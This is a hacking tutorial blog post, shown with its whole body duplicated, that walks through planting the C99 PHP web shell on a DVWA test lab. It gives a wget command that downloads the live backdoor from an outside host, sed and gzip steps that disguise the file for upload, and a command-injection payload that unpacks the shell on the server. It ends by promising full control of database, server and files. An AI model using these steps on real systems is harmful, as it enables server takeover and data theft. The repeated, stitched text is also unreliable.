Requirements :
- DVWA Penetration testing lab or OWASP BWA Pentest lab
- Backtrack 4 or higher version or (Kali Linux)
- Or Click here to create Penetration testing lab in Backtrack
- Brain.
How to Upload C99.php (Shell) Backdoor ?
As you
know guys - Websites don't allow us to upload PHP file on their server,
so simply hackers uses many ways to upload Shell on Server & if
once shell uploaded - then complete website, Server, Database will be
hacked. Commonly hackers uses different types of Vulnerabilities in
websites to upload Shell such as Command Execution, XSS, SQL Injection,
LFI, RFI upload vulnerability. So here today m gonna show you simple
tutorial - How can you upload C99shell PHP backdoor on Website server
using Command Execution and Upload Vulnerability. Please use OWASP BWA
or DVWA Penetration testing lab. So Enjoy it.
Steps to Hack:
1. Start your DVWA, Keep security on "Low" level & Click on Upload.
2. Okay, now m using Backtrack 5- I'll also recommend you to use same OS.
3. Start Backtrack Terminal, and type mkdir -p /root/backdoor hit Enter Again type cd /root/backdoor & Hit Enter.
4. Now, it's time to download PHP Backdoor, type :
- wget http://r57.gen.tr/shell/c99.rar (Hit Enter) & wait until it downloads C99.rar, Okay..! it's downloaded
- Once again type ls -l c99.rar Hit Enter.
Click on Image to Enlarge it.
4. Okay - now we've to convert it into .gz & edit C99.php file to be executed
on DVWA Server, let's do some editing.
5. Go through below all commands :
- unrar x c99.rar (Hit Enter)
- cp c99.php c99.php.bkp (Hit Enter)
- head -1 c99.php (Hit Enter)
- sed -i '1 s/^.*$/<?php/g' c99.php (Hit Enter)
- head -1 c99.php (Hit Enter)
- gzip c99.php (Hit Enter)
- ls -l (Hit Enter)
6. Click on Below Image to Enlarge it & See commands :
7. You can see it in root folder we got new compressed c99.php.gz
8. Come-on back to DVWA - Upload and upload c99.php.gz file, simply we
can't upload C99.php shell so we'll use evil mind.
Click on Image to Enlarge it
9. Now, locate that file into web browser - Basically it will be at this location.
- http://YOUR_DVWA_IP_ADDRESS/dvwa/hackable/uploads
- Replace Green text with your DVWA lab IP Address as mine is :
- http://192.168.32.128/dvwa/hackable/uploads
Click on Image to Enlarge it
10. Well, it will not work until we get .php file so now the next target is to
unzip that file and extract it into server. it's pretty cool : we'll use Command Execution techniques to Hack Website.
11. What is Command Execution : Command
Execution is one of the most dangerous vulnerability that allows an
attacker to send unwanted commands to web server and compromise
server,database and files. It can also lead to Website Defacement, MySQL
Shutdown, File Upload Vulnerabilities, Creating multiple
vulnerabilities.
12. So today we gonna execute our command on web server to unzip our file and finally we're done. Okay..! let's hack.
13. Click on Command Execution DVWA : & Send below command to Server :
- YOUR_DVWA_IP; /bin/gunzip -v ../ ../hackable/uploads/c99.php
- Replace Green text with your DVWA IP as mine is :
- 192.168.32.128; /bin/gunzip -v ../ ../hackable/uploads/c99.php
- And Click on Submit.
14. Well, now you'll get successfully message as shown in the below Image.
Click on Image to Enlarge it
15. Okay.!
now once again locate upload directory, & you'll see that your
compressed file in uncompressed. COOL.! Command Execution Rocks.
Click on Image to Enlarge it
Requirements :
- DVWA Penetration testing lab or OWASP BWA Pentest lab
- Backtrack 4 or higher version or (Kali Linux)
- Or Click here to create Penetration testing lab in Backtrack
- Brain.
How to Upload C99.php (Shell) Backdoor ?
As you
know guys - Websites don't allow us to upload PHP file on their server,
so simply hackers uses many ways to upload Shell on Server & if
once shell uploaded - then complete website, Server, Database will be
hacked. Commonly hackers uses different types of Vulnerabilities in
websites to upload Shell such as Command Execution, XSS, SQL Injection,
LFI, RFI upload vulnerability. So here today m gonna show you simple
tutorial - How can you upload C99shell PHP backdoor on Website server
using Command Execution and Upload Vulnerability. Please use OWASP BWA
or DVWA Penetration testing lab. So Enjoy it.
Steps to Hack:
1. Start your DVWA, Keep security on "Low" level & Click on Upload.
2. Okay, now m using Backtrack 5- I'll also recommend you to use same OS.
3. Start Backtrack Terminal, and type mkdir -p /root/backdoor hit Enter Again type cd /root/backdoor & Hit Enter.
4. Now, it's time to download PHP Backdoor, type :
- wget http://r57.gen.tr/shell/c99.rar (Hit Enter) & wait until it downloads C99.rar, Okay..! it's downloaded
- Once again type ls -l c99.rar Hit Enter.
Click on Image to Enlarge it.
4. Okay - now we've to convert it into .gz & edit C99.php file to be executed
on DVWA Server, let's do some editing.
5. Go through below all commands :
- unrar x c99.rar (Hit Enter)
- cp c99.php c99.php.bkp (Hit Enter)
- head -1 c99.php (Hit Enter)
- sed -i '1 s/^.*$/<?php/g' c99.php (Hit Enter)
- head -1 c99.php (Hit Enter)
- gzip c99.php (Hit Enter)
- ls -l (Hit Enter)
6. Click on Below Image to Enlarge it & See commands :
7. You can see it in root folder we got new compressed c99.php.gz
8. Come-on back to DVWA - Upload and upload c99.php.gz file, simply we
can't upload C99.php shell so we'll use evil mind.
Click on Image to Enlarge it
9. Now, locate that file into web browser - Basically it will be at this location.
- http://YOUR_DVWA_IP_ADDRESS/dvwa/hackable/uploads
- Replace Green text with your DVWA lab IP Address as mine is :
- http://192.168.32.128/dvwa/hackable/uploads
Click on Image to Enlarge it
10. Well, it will not work until we get .php file so now the next target is to
unzip that file and extract it into server. it's pretty cool : we'll use Command Execution techniques to Hack Website.
11. What is Command Execution : Command
Execution is one of the most dangerous vulnerability that allows an
attacker to send unwanted commands to web server and compromise
server,database and files. It can also lead to Website Defacement, MySQL
Shutdown, File Upload Vulnerabilities, Creating multiple
vulnerabilities.
12. So today we gonna execute our command on web server to unzip our file and finally we're done. Okay..! let's hack.
13. Click on Command Execution DVWA : & Send below command to Server :
- YOUR_DVWA_IP; /bin/gunzip -v ../ ../hackable/uploads/c99.php
- Replace Green text with your DVWA IP as mine is :
- 192.168.32.128; /bin/gunzip -v ../ ../hackable/uploads/c99.php
- And Click on Submit.
14. Well, now you'll get successfully message as shown in the below Image.
Click on Image to Enlarge it
15. Okay.!
now once again locate upload directory, & you'll see that your
compressed file in uncompressed. COOL.! Command Execution Rocks.
Click on Image to Enlarge it
16. Ok
Click on it and you're done. Now complete Database, Server, Website,
files, and all control is in your hand. Now do whatever you want to.
16. Ok
Click on it and you're done. Now complete Database, Server, Website,
files, and all control is in your hand. Now do whatever you want to.
I'll teach some more
techniques of C99.php shell how to get Database Passwords and All
Credentials details. Stay tuned with us - Please share it. & Feel
free to comment and let me know your problem.
Post a Comment